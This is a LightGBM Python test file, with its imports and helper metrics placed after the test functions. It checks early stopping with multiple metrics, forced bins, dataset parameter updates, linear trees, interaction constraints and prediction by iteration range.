            'metric': metric_list,
            'verbose': -1,
            'seed': 123,
            'gpu_use_dp': True
        }
        ret = lgb.cv(dict(params, first_metric_only=first_metric_only),
                     train_set=lgb_train, num_boost_round=25,
                     stratified=False, feval=feval,
                     early_stopping_rounds=5, verbose_eval=False,
                     eval_train_metric=eval_train_metric)
        assert assumed_iteration == len(ret[list(ret.keys())[0]])

    X, y = load_boston(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
    X_test1, X_test2, y_test1, y_test2 = train_test_split(X_test, y_test, test_size=0.5, random_state=73)
    lgb_train = lgb.Dataset(X_train, y_train)
    lgb_valid1 = lgb.Dataset(X_test1, y_test1, reference=lgb_train)
    lgb_valid2 = lgb.Dataset(X_test2, y_test2, reference=lgb_train)

    # Empirically-observed best iterations per validation set and metric.
    iter_valid1_l1 = 3
    iter_valid1_l2 = 14
    iter_valid2_l1 = 2
    iter_valid2_l2 = 15
    # All four must differ so each scenario below is distinguishable.
    assert len(set([iter_valid1_l1, iter_valid1_l2, iter_valid2_l1, iter_valid2_l2])) == 4
    iter_min_l1 = min([iter_valid1_l1, iter_valid2_l1])
    iter_min_l2 = min([iter_valid1_l2, iter_valid2_l2])
    iter_min_valid1 = min([iter_valid1_l1, iter_valid1_l2])

    iter_cv_l1 = 4
    iter_cv_l2 = 12
    assert len(set([iter_cv_l1, iter_cv_l2])) == 2
    iter_cv_min = min([iter_cv_l1, iter_cv_l2])

    # test for lgb.train
    metrics_combination_train_regression(lgb_valid1, [], iter_valid1_l2, False)
    metrics_combination_train_regression(lgb_valid1, [], iter_valid1_l2, True)
    metrics_combination_train_regression(lgb_valid1, None, iter_valid1_l2, False)
    metrics_combination_train_regression(lgb_valid1, None, iter_valid1_l2, True)
    metrics_combination_train_regression(lgb_valid1, 'l2', iter_valid1_l2, True)
    metrics_combination_train_regression(lgb_valid1, 'l1', iter_valid1_l1, True)
    metrics_combination_train_regression(lgb_valid1, ['l2', 'l1'], iter_valid1_l2, True)
    metrics_combination_train_regression(lgb_valid1, ['l1', 'l2'], iter_valid1_l1, True)
    metrics_combination_train_regression(lgb_valid1, ['l2', 'l1'], iter_min_valid1, False)
    metrics_combination_train_regression(lgb_valid1, ['l1', 'l2'], iter_min_valid1, False)

    # test feval for lgb.train
    metrics_combination_train_regression(lgb_valid1, 'None', 1, False,
                                         feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
                                                                          constant_metric(preds, train_data)])
    metrics_combination_train_regression(lgb_valid1, 'None', 25, True,
                                         feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
                                                                          constant_metric(preds, train_data)])
    metrics_combination_train_regression(lgb_valid1, 'None', 1, True,
                                         feval=lambda preds, train_data: [constant_metric(preds, train_data),
                                                                          decreasing_metric(preds, train_data)])

    # test with two valid data for lgb.train
    metrics_combination_train_regression([lgb_valid1, lgb_valid2], ['l2', 'l1'], iter_min_l2, True)
    metrics_combination_train_regression([lgb_valid2, lgb_valid1], ['l2', 'l1'], iter_min_l2, True)
    metrics_combination_train_regression([lgb_valid1, lgb_valid2], ['l1', 'l2'], iter_min_l1, True)
    metrics_combination_train_regression([lgb_valid2, lgb_valid1], ['l1', 'l2'], iter_min_l1, True)

    # test for lgb.cv
    metrics_combination_cv_regression(None, iter_cv_l2, True, False)
    metrics_combination_cv_regression('l2', iter_cv_l2, True, False)
    metrics_combination_cv_regression('l1', iter_cv_l1, True, False)
    metrics_combination_cv_regression(['l2', 'l1'], iter_cv_l2, True, False)
    metrics_combination_cv_regression(['l1', 'l2'], iter_cv_l1, True, False)
    metrics_combination_cv_regression(['l2', 'l1'], iter_cv_min, False, False)
    metrics_combination_cv_regression(['l1', 'l2'], iter_cv_min, False, False)
    metrics_combination_cv_regression(None, iter_cv_l2, True, True)
    metrics_combination_cv_regression('l2', iter_cv_l2, True, True)
    metrics_combination_cv_regression('l1', iter_cv_l1, True, True)
    metrics_combination_cv_regression(['l2', 'l1'], iter_cv_l2, True, True)
    metrics_combination_cv_regression(['l1', 'l2'], iter_cv_l1, True, True)
    metrics_combination_cv_regression(['l2', 'l1'], iter_cv_min, False, True)
    metrics_combination_cv_regression(['l1', 'l2'], iter_cv_min, False, True)

    # test feval for lgb.cv
    metrics_combination_cv_regression('None', 1, False, False,
                                      feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
                                                                       constant_metric(preds, train_data)])
    metrics_combination_cv_regression('None', 25, True, False,
                                      feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
                                                                       constant_metric(preds, train_data)])
    metrics_combination_cv_regression('None', 1, True, False,
                                      feval=lambda preds, train_data: [constant_metric(preds, train_data),
                                                                       decreasing_metric(preds, train_data)])
def test_node_level_subcol():
    """Per-node feature subsampling must train a usable model, and changing
    ``feature_fraction`` must change the fitted model."""
    X, y = load_breast_cancer(return_X_y=True)
    X_fit, X_holdout, y_fit, y_holdout = train_test_split(X, y, test_size=0.1, random_state=42)
    params = dict(
        objective='binary',
        metric='binary_logloss',
        feature_fraction_bynode=0.8,
        feature_fraction=1.0,
        verbose=-1,
    )
    train_set = lgb.Dataset(X_fit, y_fit)
    valid_set = lgb.Dataset(X_holdout, y_holdout, reference=train_set)
    history = {}
    booster = lgb.train(params, train_set,
                        num_boost_round=25,
                        valid_sets=valid_set,
                        verbose_eval=False,
                        evals_result=history)
    loss = log_loss(y_holdout, booster.predict(X_holdout))
    assert loss < 0.14
    assert history['valid_0']['binary_logloss'][-1] == pytest.approx(loss)
    # a different tree-level feature fraction must produce different predictions
    params['feature_fraction'] = 0.5
    booster_alt = lgb.train(params, train_set, num_boost_round=25)
    loss_alt = log_loss(y_holdout, booster_alt.predict(X_holdout))
    assert loss != loss_alt
def test_forced_bins():
    """Check that ``forcedbins_filename`` forces bin boundaries on features.

    Uses the JSON files shipped with the repository's regression example;
    assumes this test file lives two directories below the repo root.
    """
    x = np.empty((100, 2))
    x[:, 0] = np.arange(0, 1, 0.01)
    x[:, 1] = -np.arange(0, 1, 0.01)
    y = np.arange(0, 1, 0.01)
    forcedbins_filename = (
        Path(__file__).absolute().parents[2] / 'examples' / 'regression' / 'forced_bins.json'
    )
    params = {'objective': 'regression_l1',
              'max_bin': 5,
              'forcedbins_filename': forcedbins_filename,
              'num_leaves': 2,
              'min_data_in_leaf': 1,
              'verbose': -1}
    lgb_x = lgb.Dataset(x, label=y)
    est = lgb.train(params, lgb_x, num_boost_round=20)
    new_x = np.zeros((3, x.shape[1]))
    new_x[:, 0] = [0.31, 0.37, 0.41]
    predicted = est.predict(new_x)
    # the forced boundaries separate these three values into distinct bins
    assert len(np.unique(predicted)) == 3
    new_x[:, 0] = [0, 0, 0]
    new_x[:, 1] = [-0.9, -0.6, -0.3]
    predicted = est.predict(new_x)
    # feature 1 has no forced bins, so with max_bin=5 these collapse together
    assert len(np.unique(predicted)) == 1
    # without forced bins the default binning separates the values again
    params['forcedbins_filename'] = ''
    lgb_x = lgb.Dataset(x, label=y)
    est = lgb.train(params, lgb_x, num_boost_round=20)
    predicted = est.predict(new_x)
    assert len(np.unique(predicted)) == 3
    params['forcedbins_filename'] = (
        Path(__file__).absolute().parents[2] / 'examples' / 'regression' / 'forced_bins2.json'
    )
    params['max_bin'] = 11
    lgb_x = lgb.Dataset(x[:, :1], label=y)
    est = lgb.train(params, lgb_x, num_boost_round=50)
    predicted = est.predict(x[1:, :1])
    _, counts = np.unique(predicted, return_counts=True)
    # forced_bins2.json yields roughly equally populated bins (9-11 points each)
    assert min(counts) >= 9
    assert max(counts) <= 11
def test_binning_same_sign():
    """Binning must behave correctly for features that are entirely positive
    or entirely negative."""
    features = np.empty((99, 2))
    features[:, 0] = np.arange(0.01, 1, 0.01)    # strictly positive column
    features[:, 1] = -np.arange(0.01, 1, 0.01)   # strictly negative column
    target = np.arange(0.01, 1, 0.01)
    params = dict(objective='regression_l1',
                  max_bin=5,
                  num_leaves=2,
                  min_data_in_leaf=1,
                  verbose=-1,
                  seed=0)
    dataset = lgb.Dataset(features, label=target)
    booster = lgb.train(params, dataset, num_boost_round=20)

    # column 0 only ever saw positive values: -1 and 0 must share a bin,
    # while 1 must be distinguishable from both
    probe = np.zeros((3, 2))
    probe[:, 0] = [-1, 0, 1]
    preds = booster.predict(probe)
    assert preds[0] == pytest.approx(preds[1])
    assert preds[1] != pytest.approx(preds[2])

    # symmetric property for the all-negative column 1
    probe = np.zeros((3, 2))
    probe[:, 1] = [-1, 0, 1]
    preds = booster.predict(probe)
    assert preds[0] != pytest.approx(preds[1])
    assert preds[1] == pytest.approx(preds[2])
def test_dataset_update_params():
    """Dataset parameters may only change in safe ways after construction.

    Decreasing ``min_data_in_leaf`` is allowed before lazy construction or
    when raw data is kept / feature pre-filtering is disabled; once the
    Dataset is constructed with ``feature_pre_filter=True``, lowering it or
    changing any binning-related parameter must raise ``LightGBMError``.
    """
    default_params = {"max_bin": 100,
                      "max_bin_by_feature": [20, 10],
                      "bin_construct_sample_cnt": 10000,
                      "min_data_in_bin": 1,
                      "use_missing": False,
                      "zero_as_missing": False,
                      "categorical_feature": [0],
                      "feature_pre_filter": True,
                      "pre_partition": False,
                      "enable_bundle": True,
                      "data_random_seed": 0,
                      "is_enable_sparse": True,
                      "header": True,
                      "two_round": True,
                      "label_column": 0,
                      "weight_column": 0,
                      "group_column": 0,
                      "ignore_column": 0,
                      "min_data_in_leaf": 10,
                      "linear_tree": False,
                      "precise_float_parser": True,
                      "verbose": -1}
    # Each entry differs from default_params and must be rejected after construction.
    unchangeable_params = {"max_bin": 150,
                           "max_bin_by_feature": [30, 5],
                           "bin_construct_sample_cnt": 5000,
                           "min_data_in_bin": 2,
                           "use_missing": True,
                           "zero_as_missing": True,
                           "categorical_feature": [0, 1],
                           "feature_pre_filter": False,
                           "pre_partition": True,
                           "enable_bundle": False,
                           "data_random_seed": 1,
                           "is_enable_sparse": False,
                           "header": False,
                           "two_round": False,
                           "label_column": 1,
                           "weight_column": 1,
                           "group_column": 1,
                           "ignore_column": 1,
                           "forcedbins_filename": "/some/path/forcedbins.json",
                           "min_data_in_leaf": 2,
                           "linear_tree": True,
                           "precise_float_parser": False}
    X = np.random.random((100, 2))
    y = np.random.random(100)

    # decreasing without freeing raw data is allowed
    lgb_data = lgb.Dataset(X, y, params=default_params, free_raw_data=False).construct()
    default_params["min_data_in_leaf"] -= 1
    lgb.train(default_params, lgb_data, num_boost_round=3)

    # decreasing before lazy init is allowed
    lgb_data = lgb.Dataset(X, y, params=default_params)
    default_params["min_data_in_leaf"] -= 1
    lgb.train(default_params, lgb_data, num_boost_round=3)

    # increasing is allowed
    default_params["min_data_in_leaf"] += 2
    lgb.train(default_params, lgb_data, num_boost_round=3)

    # decreasing with disabled filter is allowed
    default_params["feature_pre_filter"] = False
    lgb_data = lgb.Dataset(X, y, params=default_params).construct()
    default_params["min_data_in_leaf"] -= 4
    lgb.train(default_params, lgb_data, num_boost_round=3)

    # decreasing with enabled filter is disallowed;
    # also changes of other params are disallowed
    default_params["feature_pre_filter"] = True
    lgb_data = lgb.Dataset(X, y, params=default_params).construct()
    for key, value in unchangeable_params.items():
        new_params = default_params.copy()
        new_params[key] = value
        if key != "forcedbins_filename":
            param_name = key
        else:
            # the C++ error message uses a human-readable name for this one
            param_name = "forced bins"
        err_msg = ("Reducing `min_data_in_leaf` with `feature_pre_filter=true` may cause *"
                   if key == "min_data_in_leaf"
                   else f"Cannot change {param_name} *")
        with np.testing.assert_raises_regex(lgb.basic.LightGBMError, err_msg):
            lgb.train(new_params, lgb_data, num_boost_round=3)
def test_dataset_params_with_reference():
    """A validation Dataset built with ``reference=`` inherits the reference's params."""
    shared_params = {"max_bin": 100}
    X_tr = np.random.random((100, 2))
    y_tr = np.random.random(100)
    X_va = np.random.random((100, 2))
    y_va = np.random.random(100)
    dtrain = lgb.Dataset(X_tr, y_tr, params=shared_params, free_raw_data=False).construct()
    dvalid = lgb.Dataset(X_va, y_va, reference=dtrain, free_raw_data=False).construct()
    # both Datasets must report the same parameters even though only the
    # training set was given them explicitly
    assert dtrain.get_params() == shared_params
    assert dvalid.get_params() == shared_params
    lgb.train(shared_params, dtrain, valid_sets=[dvalid])
def test_extra_trees():
    """Enabling ``extra_trees`` adds regularization, so train error must rise."""
    X, y = load_boston(return_X_y=True)
    dataset = lgb.Dataset(X, label=y)
    params = dict(objective='regression',
                  num_leaves=32,
                  verbose=-1,
                  extra_trees=False,
                  seed=0)
    baseline = lgb.train(params, dataset, num_boost_round=10)
    baseline_err = mean_squared_error(y, baseline.predict(X))
    params['extra_trees'] = True
    regularized = lgb.train(params, dataset, num_boost_round=10)
    regularized_err = mean_squared_error(y, regularized.predict(X))
    assert baseline_err < regularized_err
def test_path_smoothing():
    """Path smoothing adds regularization, so train error must rise."""
    X, y = load_boston(return_X_y=True)
    dataset = lgb.Dataset(X, label=y)
    params = dict(objective='regression',
                  num_leaves=32,
                  verbose=-1,
                  seed=0)
    plain = lgb.train(params, dataset, num_boost_round=10)
    plain_err = mean_squared_error(y, plain.predict(X))
    params['path_smooth'] = 1
    smoothed = lgb.train(params, dataset, num_boost_round=10)
    smoothed_err = mean_squared_error(y, smoothed.predict(X))
    assert plain_err < smoothed_err
def test_trees_to_dataframe():
    """``trees_to_dataframe()`` must agree with ``feature_importance()`` and
    handle the degenerate single-leaf model."""
    pytest.importorskip("pandas")

    def _imptcs_to_numpy(X, impcts_dict):
        # Densify a {feature_name: importance} dict into a list aligned with
        # the default Column_<i> feature names.
        cols = [f'Column_{i}' for i in range(X.shape[1])]
        return [impcts_dict.get(col, 0.) for col in cols]

    X, y = load_breast_cancer(return_X_y=True)
    data = lgb.Dataset(X, label=y)
    num_trees = 10
    bst = lgb.train({"objective": "binary", "verbose": -1}, data, num_trees)
    tree_df = bst.trees_to_dataframe()
    # split counts: rows with a non-null split_gain are internal nodes
    split_dict = (tree_df[~tree_df['split_gain'].isnull()]
                  .groupby('split_feature')
                  .size()
                  .to_dict())
    gains_dict = (tree_df
                  .groupby('split_feature')['split_gain']
                  .sum()
                  .to_dict())
    tree_split = _imptcs_to_numpy(X, split_dict)
    tree_gains = _imptcs_to_numpy(X, gains_dict)
    mod_split = bst.feature_importance('split')
    mod_gains = bst.feature_importance('gain')
    num_trees_from_df = tree_df['tree_index'].nunique()
    # each root (node_depth == 1) carries the full observation count
    obs_counts_from_df = tree_df.loc[tree_df['node_depth'] == 1, 'count'].values
    np.testing.assert_equal(tree_split, mod_split)
    np.testing.assert_allclose(tree_gains, mod_gains)
    assert num_trees_from_df == num_trees
    np.testing.assert_equal(obs_counts_from_df, len(y))

    # test edge case with one leaf
    X = np.ones((10, 2))
    y = np.random.rand(10)
    data = lgb.Dataset(X, label=y)
    bst = lgb.train({"objective": "binary", "verbose": -1}, data, num_trees)
    tree_df = bst.trees_to_dataframe()
    # a constant-feature dataset yields a single leaf-only row
    assert len(tree_df) == 1
    assert tree_df.loc[0, 'tree_index'] == 0
    assert tree_df.loc[0, 'node_depth'] == 1
    assert tree_df.loc[0, 'node_index'] == "0-L0"
    assert tree_df.loc[0, 'value'] is not None
    # split-related columns are undefined for a leaf-only tree
    for col in ('left_child', 'right_child', 'parent_index', 'split_feature',
                'split_gain', 'threshold', 'decision_type', 'missing_direction',
                'missing_type', 'weight', 'count'):
        assert tree_df.loc[0, col] is None
def test_interaction_constraints():
    """Tighter interaction constraints must monotonically reduce train accuracy."""
    X, y = load_boston(return_X_y=True)
    num_features = X.shape[1]
    train_data = lgb.Dataset(X, label=y)
    # check that constraint containing all features is equivalent to no constraint
    params = {'verbose': -1,
              'seed': 0}
    est = lgb.train(params, train_data, num_boost_round=10)
    pred1 = est.predict(X)
    est = lgb.train(dict(params, interaction_constraints=[list(range(num_features))]), train_data,
                    num_boost_round=10)
    pred2 = est.predict(X)
    np.testing.assert_allclose(pred1, pred2)
    # check that constraint partitioning the features reduces train accuracy
    est = lgb.train(dict(params, interaction_constraints=[list(range(num_features // 2)),
                                                          list(range(num_features // 2, num_features))]),
                    train_data, num_boost_round=10)
    pred3 = est.predict(X)
    assert mean_squared_error(y, pred1) < mean_squared_error(y, pred3)
    # check that constraints consisting of single features reduce accuracy further
    est = lgb.train(dict(params, interaction_constraints=[[i] for i in range(num_features)]), train_data,
                    num_boost_round=10)
    pred4 = est.predict(X)
    assert mean_squared_error(y, pred3) < mean_squared_error(y, pred4)
    # test that interaction constraints work when not all features are used
    # (feature 0 is all-zero and never split on)
    X = np.concatenate([np.zeros((X.shape[0], 1)), X], axis=1)
    num_features = X.shape[1]
    train_data = lgb.Dataset(X, label=y)
    est = lgb.train(dict(params, interaction_constraints=[[0] + list(range(2, num_features)),
                                                          [1] + list(range(2, num_features))]),
                    train_data, num_boost_round=10)
def test_linear_trees(tmp_path):
    """Linear trees must beat plain trees on linear data, and must keep
    working with NaNs, bagging, categorical features and refit.

    Note: ``x`` and ``y`` are mutated in place between the sub-tests below,
    so the order of these sections matters.
    """
    # check that setting linear_tree=True fits better than ordinary trees when data has linear relationship
    np.random.seed(0)
    x = np.arange(0, 100, 0.1)
    y = 2 * x + np.random.normal(0, 0.1, len(x))
    x = x[:, np.newaxis]
    lgb_train = lgb.Dataset(x, label=y)
    params = {'verbose': -1,
              'metric': 'mse',
              'seed': 0,
              'num_leaves': 2}
    est = lgb.train(params, lgb_train, num_boost_round=10)
    pred1 = est.predict(x)
    lgb_train = lgb.Dataset(x, label=y)
    res = {}
    est = lgb.train(dict(params, linear_tree=True), lgb_train, num_boost_round=10, evals_result=res,
                    valid_sets=[lgb_train], valid_names=['train'])
    pred2 = est.predict(x)
    assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred2), abs=1e-1)
    assert mean_squared_error(y, pred2) < mean_squared_error(y, pred1)
    # test again with nans in data
    x[:10] = np.nan
    lgb_train = lgb.Dataset(x, label=y)
    est = lgb.train(params, lgb_train, num_boost_round=10)
    pred1 = est.predict(x)
    lgb_train = lgb.Dataset(x, label=y)
    res = {}
    est = lgb.train(dict(params, linear_tree=True), lgb_train, num_boost_round=10, evals_result=res,
                    valid_sets=[lgb_train], valid_names=['train'])
    pred2 = est.predict(x)
    assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred2), abs=1e-1)
    assert mean_squared_error(y, pred2) < mean_squared_error(y, pred1)
    # test again with bagging
    res = {}
    est = lgb.train(dict(params, linear_tree=True, subsample=0.8, bagging_freq=1), lgb_train,
                    num_boost_round=10, evals_result=res, valid_sets=[lgb_train], valid_names=['train'])
    pred = est.predict(x)
    assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred), abs=1e-1)
    # test with a feature that has only one non-nan value
    x = np.concatenate([np.ones([x.shape[0], 1]), x], 1)
    x[500:, 1] = np.nan
    y[500:] += 10
    lgb_train = lgb.Dataset(x, label=y)
    res = {}
    est = lgb.train(dict(params, linear_tree=True, subsample=0.8, bagging_freq=1), lgb_train,
                    num_boost_round=10, evals_result=res, valid_sets=[lgb_train], valid_names=['train'])
    pred = est.predict(x)
    assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred), abs=1e-1)
    # test with a categorical feature
    x[:250, 0] = 0
    y[:250] += 10
    lgb_train = lgb.Dataset(x, label=y)
    est = lgb.train(dict(params, linear_tree=True, subsample=0.8, bagging_freq=1), lgb_train,
                    num_boost_round=10, categorical_feature=[0])
    # test refit: same results on same data
    est2 = est.refit(x, label=y)
    p1 = est.predict(x)
    p2 = est2.predict(x)
    assert np.mean(np.abs(p1 - p2)) < 2
    # test refit with save and load
    temp_model = str(tmp_path / "temp_model.txt")
    est.save_model(temp_model)
    est2 = lgb.Booster(model_file=temp_model)
    est2 = est2.refit(x, label=y)
    p1 = est.predict(x)
    p2 = est2.predict(x)
    assert np.mean(np.abs(p1 - p2)) < 2
    # test refit: different results training on different data
    est3 = est.refit(x[:100, :], label=y[:100])
    p3 = est3.predict(x)
    assert np.mean(np.abs(p2 - p1)) > np.abs(np.max(p3 - p1))
    # test when num_leaves - 1 < num_features and when num_leaves - 1 > num_features
    X_train, _, y_train, _ = train_test_split(*load_breast_cancer(return_X_y=True), test_size=0.1, random_state=2)
    params = {'linear_tree': True,
              'verbose': -1,
              'metric': 'mse',
              'seed': 0}
    train_data = lgb.Dataset(X_train, label=y_train, params=dict(params, num_leaves=2))
    est = lgb.train(params, train_data, num_boost_round=10, categorical_feature=[0])
    train_data = lgb.Dataset(X_train, label=y_train, params=dict(params, num_leaves=60))
    est = lgb.train(params, train_data, num_boost_round=10, categorical_feature=[0])
def test_save_and_load_linear(tmp_path):
    """Linear models must survive a Dataset binary round-trip and a text
    model-file round-trip with identical predictions."""
    X_train, X_test, y_train, y_test = train_test_split(*load_breast_cancer(return_X_y=True), test_size=0.1,
                                                        random_state=2)
    # prepend a binary column that is used as a categorical feature below
    X_train = np.concatenate([np.ones((X_train.shape[0], 1)), X_train], 1)
    X_train[:X_train.shape[0] // 2, 0] = 0
    y_train[:X_train.shape[0] // 2] = 1
    params = {'linear_tree': True}
    train_data_1 = lgb.Dataset(X_train, label=y_train, params=params)
    est_1 = lgb.train(params, train_data_1, num_boost_round=10, categorical_feature=[0])
    pred_1 = est_1.predict(X_train)
    # round-trip the Dataset through its binary serialization
    tmp_dataset = str(tmp_path / 'temp_dataset.bin')
    train_data_1.save_binary(tmp_dataset)
    train_data_2 = lgb.Dataset(tmp_dataset)
    est_2 = lgb.train(params, train_data_2, num_boost_round=10)
    pred_2 = est_2.predict(X_train)
    np.testing.assert_allclose(pred_1, pred_2)
    # round-trip the trained model through a text model file
    model_file = str(tmp_path / 'model.txt')
    est_2.save_model(model_file)
    est_3 = lgb.Booster(model_file=model_file)
    pred_3 = est_3.predict(X_train)
    np.testing.assert_allclose(pred_2, pred_3)
def test_linear_single_leaf():
    """Linear trees must still work when a huge ``min_sum_hessian`` forces
    trees down to a single leaf."""
    X, y = load_breast_cancer(return_X_y=True)
    dtrain = lgb.Dataset(X, label=y)
    params = dict(objective="binary",
                  linear_tree=True,
                  min_sum_hessian=5000)
    model = lgb.train(params, dtrain, num_boost_round=5)
    predictions = model.predict(X)
    assert log_loss(y, predictions) < 0.661
def test_predict_with_start_iteration():
    """Predictions over iteration slices must compose additively, and the
    special values of ``start_iteration``/``num_iteration`` must behave as
    documented (<=0 meaning "from the start" / "all remaining trees")."""

    def inner_test(X, y, params, early_stopping_rounds):
        X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
        train_data = lgb.Dataset(X_train, label=y_train)
        valid_data = lgb.Dataset(X_test, label=y_test)
        booster = lgb.train(params, train_data, num_boost_round=50, early_stopping_rounds=early_stopping_rounds,
                            valid_sets=[valid_data])

        # test that the predict once with all iterations equals summed results with start_iteration and num_iteration
        all_pred = booster.predict(X, raw_score=True)
        all_pred_contrib = booster.predict(X, pred_contrib=True)
        steps = [10, 12]
        for step in steps:
            pred = np.zeros_like(all_pred)
            pred_contrib = np.zeros_like(all_pred_contrib)
            for start_iter in range(0, 50, step):
                pred += booster.predict(X, start_iteration=start_iter, num_iteration=step, raw_score=True)
                pred_contrib += booster.predict(X, start_iteration=start_iter, num_iteration=step, pred_contrib=True)
            np.testing.assert_allclose(all_pred, pred)
            np.testing.assert_allclose(all_pred_contrib, pred_contrib)

        # test the case where start_iteration <= 0, and num_iteration is None
        pred1 = booster.predict(X, start_iteration=-1)
        pred2 = booster.predict(X, num_iteration=booster.best_iteration)
        np.testing.assert_allclose(pred1, pred2)

        # test the case where start_iteration > 0, and num_iteration <= 0
        pred4 = booster.predict(X, start_iteration=10, num_iteration=-1)
        pred5 = booster.predict(X, start_iteration=10, num_iteration=90)
        pred6 = booster.predict(X, start_iteration=10, num_iteration=0)
        np.testing.assert_allclose(pred4, pred5)
        np.testing.assert_allclose(pred4, pred6)

        # test the case where start_iteration > 0, and num_iteration <= 0, with pred_leaf=True
        pred4 = booster.predict(X, start_iteration=10, num_iteration=-1, pred_leaf=True)
        pred5 = booster.predict(X, start_iteration=10, num_iteration=40, pred_leaf=True)
        pred6 = booster.predict(X, start_iteration=10, num_iteration=0, pred_leaf=True)
        np.testing.assert_allclose(pred4, pred5)
        np.testing.assert_allclose(pred4, pred6)

        # test the case where start_iteration > 0, and num_iteration <= 0, with pred_contrib=True
        pred4 = booster.predict(X, start_iteration=10, num_iteration=-1, pred_contrib=True)
        pred5 = booster.predict(X, start_iteration=10, num_iteration=40, pred_contrib=True)
        pred6 = booster.predict(X, start_iteration=10, num_iteration=0, pred_contrib=True)
        np.testing.assert_allclose(pred4, pred5)
        np.testing.assert_allclose(pred4, pred6)

    # test for regression
    X, y = load_boston(return_X_y=True)
    params = {
        'objective': 'regression',
        'verbose': -1,
        'metric': 'l2',
        'learning_rate': 0.5
    }
    # test both with and without early stopping
    inner_test(X, y, params, early_stopping_rounds=1)
    inner_test(X, y, params, early_stopping_rounds=5)
    inner_test(X, y, params, early_stopping_rounds=None)

    # test for multi-class
    X, y = load_iris(return_X_y=True)
    params = {
        'objective': 'multiclass',
        'num_class': 3,
        'verbose': -1,
        'metric': 'multi_error'
    }
    # test both with and without early stopping
    inner_test(X, y, params, early_stopping_rounds=1)
    inner_test(X, y, params, early_stopping_rounds=5)
    inner_test(X, y, params, early_stopping_rounds=None)

    # test for binary
    X, y = load_breast_cancer(return_X_y=True)
    params = {
        'objective': 'binary',
        'verbose': -1,
        'metric': 'auc'
    }
    # test both with and without early stopping
    inner_test(X, y, params, early_stopping_rounds=1)
    inner_test(X, y, params, early_stopping_rounds=5)
    inner_test(X, y, params, early_stopping_rounds=None)
def test_average_precision_metric():
    """LightGBM's average_precision must match scikit-learn's implementation,
    and must be exactly 1 for a perfectly predicted single-class target."""
    X, y = load_breast_cancer(return_X_y=True)
    params = dict(objective='binary',
                  metric='average_precision',
                  verbose=-1)
    history = {}
    dataset = lgb.Dataset(X, label=y)
    model = lgb.train(params, dataset, num_boost_round=10,
                      valid_sets=[dataset], evals_result=history)
    lgb_ap = history['training']['average_precision'][-1]
    sklearn_ap = average_precision_score(y, model.predict(X))
    assert lgb_ap == pytest.approx(sklearn_ap)
    # degenerate case: all-positive labels are predicted perfectly -> AP == 1
    y = y.copy()
    y[:] = 1
    dataset = lgb.Dataset(X, label=y)
    lgb.train(params, dataset, num_boost_round=1,
              valid_sets=[dataset], evals_result=history)
    assert history['training']['average_precision'][-1] == pytest.approx(1)
def test_reset_params_works_with_metric_num_class_and_boosting():
    """``Booster.reset_parameter`` must keep metric/num_class/boosting in
    ``params`` and merge them with the Dataset's own parameters."""
    X, y = load_breast_cancer(return_X_y=True)
    dataset_params = {"max_bin": 150}
    booster_params = {
        'objective': 'multiclass',
        'max_depth': 4,
        'bagging_fraction': 0.8,
        'metric': ['multi_logloss', 'multi_error'],
        'boosting': 'gbdt',
        'num_class': 5
    }
    dtrain = lgb.Dataset(X, y, params=dataset_params)
    bst = lgb.Booster(params=booster_params, train_set=dtrain)
    assert bst.params == dict(dataset_params, **booster_params)
    # after resetting, both the original and returned boosters see the merge
    booster_params['bagging_fraction'] += 0.1
    new_bst = bst.reset_parameter(booster_params)
    merged = dict(dataset_params, **booster_params)
    assert bst.params == merged
    assert new_bst.params == merged
def test_dump_model():
    """``dump_model`` output contains linear-leaf fields only for linear trees."""
    X, y = load_breast_cancer(return_X_y=True)
    base_params = {
        "objective": "binary",
        "verbose": -1
    }

    def dumped(train_params):
        # train a fresh 5-round model and return its dump as a string
        booster = lgb.train(train_params, lgb.Dataset(X, label=y), num_boost_round=5)
        return str(booster.dump_model(5, 0))

    plain_dump = dumped(base_params)
    for linear_key in ("leaf_features", "leaf_coeff", "leaf_const"):
        assert linear_key not in plain_dump
    assert "leaf_value" in plain_dump
    assert "leaf_count" in plain_dump

    linear_dump = dumped(dict(base_params, linear_tree=True))
    for key in ("leaf_features", "leaf_coeff", "leaf_const", "leaf_value", "leaf_count"):
        assert key in linear_dump
| # coding: utf-8
import copy
import itertools
import math
import pickle
import platform
import random
from pathlib import Path
import numpy as np
import psutil
import pytest
from scipy.sparse import csr_matrix, isspmatrix_csc, isspmatrix_csr
from sklearn.datasets import load_svmlight_file, make_multilabel_classification
from sklearn.metrics import average_precision_score, log_loss, mean_absolute_error, mean_squared_error, roc_auc_score
from sklearn.model_selection import GroupKFold, TimeSeriesSplit, train_test_split
import lightgbm as lgb
from .utils import load_boston, load_breast_cancer, load_digits, load_iris
# Infinite sequence 0, -1, -2, ... consumed by decreasing_metric so that the
# fake metric value strictly improves on every evaluation call.
decreasing_generator = itertools.count(0, -1)
def dummy_obj(preds, train_data):
    """Trivial custom objective: unit gradient and unit hessian per sample."""
    grad = np.ones(preds.shape)
    hess = np.ones(preds.shape)
    return grad, hess
def multi_logloss(y_true, y_pred):
    """Mean negative log-likelihood of the true class under ``y_pred``.

    ``y_pred`` is indexable as (sample, class) probabilities.
    """
    losses = []
    for row, label in enumerate(y_true):
        losses.append(-math.log(y_pred[row][label]))
    return np.mean(losses)
def top_k_error(y_true, y_pred, k):
    """Fraction of samples whose true-class score is not strictly above all
    scores outside the top ``k``.

    ``y_pred`` is an (n_samples, n_classes) score matrix.  When ``k`` equals
    the number of classes every sample is trivially correct, so the error is 0.
    """
    n_classes = y_pred.shape[1]
    if k == n_classes:
        return 0
    # best score outside each row's k largest entries
    rest_best = np.max(-np.partition(-y_pred, k)[:, k:], axis=1)
    true_scores = y_pred[np.arange(len(y_true)), y_true]
    return 1 - np.mean(true_scores > rest_best)
def constant_metric(preds, train_data):
    """Custom eval metric that never improves: always 0.0, lower-is-better."""
    return 'error', 0.0, False
def decreasing_metric(preds, train_data):
    # Custom eval metric whose value strictly decreases on every call
    # (draws from the module-level decreasing_generator), so with
    # higher_better=False it always looks like an improvement.
